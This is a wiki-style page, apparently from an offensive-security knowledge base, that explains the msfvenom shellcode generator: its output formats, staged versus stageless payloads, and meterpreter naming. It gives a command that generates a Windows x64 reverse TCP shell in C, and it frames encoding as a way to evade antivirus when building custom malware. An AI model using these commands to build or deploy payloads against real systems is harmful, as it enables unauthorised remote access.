SecuriTreeHome

SecuriTree

  • Malware Theory
    • Anti-Analysis
      • Anti-Debugging
      • Anti-VM
    • Persistency
    • Listener
    • Communication
    • Initial Access
      • Tricks
      • Executables
      • Containers
        (MOTW Bypass)
      • Delivery
    • Shellcode
      • Execution
      • Preparation
        • Encoding
        • Encryption
        • Placement
        • Generators
          (Msfvenom)
#Malware Theory #Shellcode #Preparation #Generators (Msfvenom)

Shellcode Generators

There are open-source shellcode generators. They can usually generate different payloads with encoding and encryption for different programming languages. The best known is msfvenom. Usually mature and expensive C2 (Command & Control) frameworks have their own compatible shellcode generators.

Msfvenom

Msfvenom allows payloads to be prepared very quickly, but all serious antiviruses are very familiar with the payloads it generates. Without additional encoding or obfuscation, there is no chance of using any generated payload in a real-world scenario. It will be detected immediately.

Msfvenom has basically two output formats:

  • Transform formats: generate a payload simply as a variable ready for use in various programming languages (such as C or C#). All serious antiviruses are very familiar with the payloads it generates. Without additional encoding or obfuscation, there is no chance of using any generated payload in a real-world scenario. But it's still useful as a basis to further encryption or encoding and custom template development.
  • Executable gormats: generate a ready-made executable file (.exe, .dll, .vbs and so on). Do not use this option. All these generated templates are very well detected by all antiviruses. Encryption and encoding doesn't actually change anything, because antiviruses detect the executable file template itself, not the payload.

There are two basic categories of msfvenom shellcodes:

  • stageless (e.g. windows/x64/shell_reverse_tcp) - the generated payload contains everything needed to connect back to the listener.
  • staged (e.g. windows/x64/shell/reverse_tcp) - the generated payload contains only a downloader of the actual shellcode from an external server (Metasploit listeners).

NOTE: There are also payloads prepared specifically to work with the open-source Metasploit C2 framework. In addition to the standard remote shell, they add a lot of additional offensive functionality. The naming convention is the same as the ones given above, but instead of the word "shell" they contain the word "meterpreter".

# List of all available payloads
msfvenom --list payloads
 
# List of all available output formats
msfvenom --list formats
 
# Stageless reverse TCP shell in C format
msfvenom -p windows/x64/shell_reverse_tcp -f c LHOST=$ip LPORT=$port

We can use the generated shellcode in many different programming languages to create our own custom malware.

Children

Generators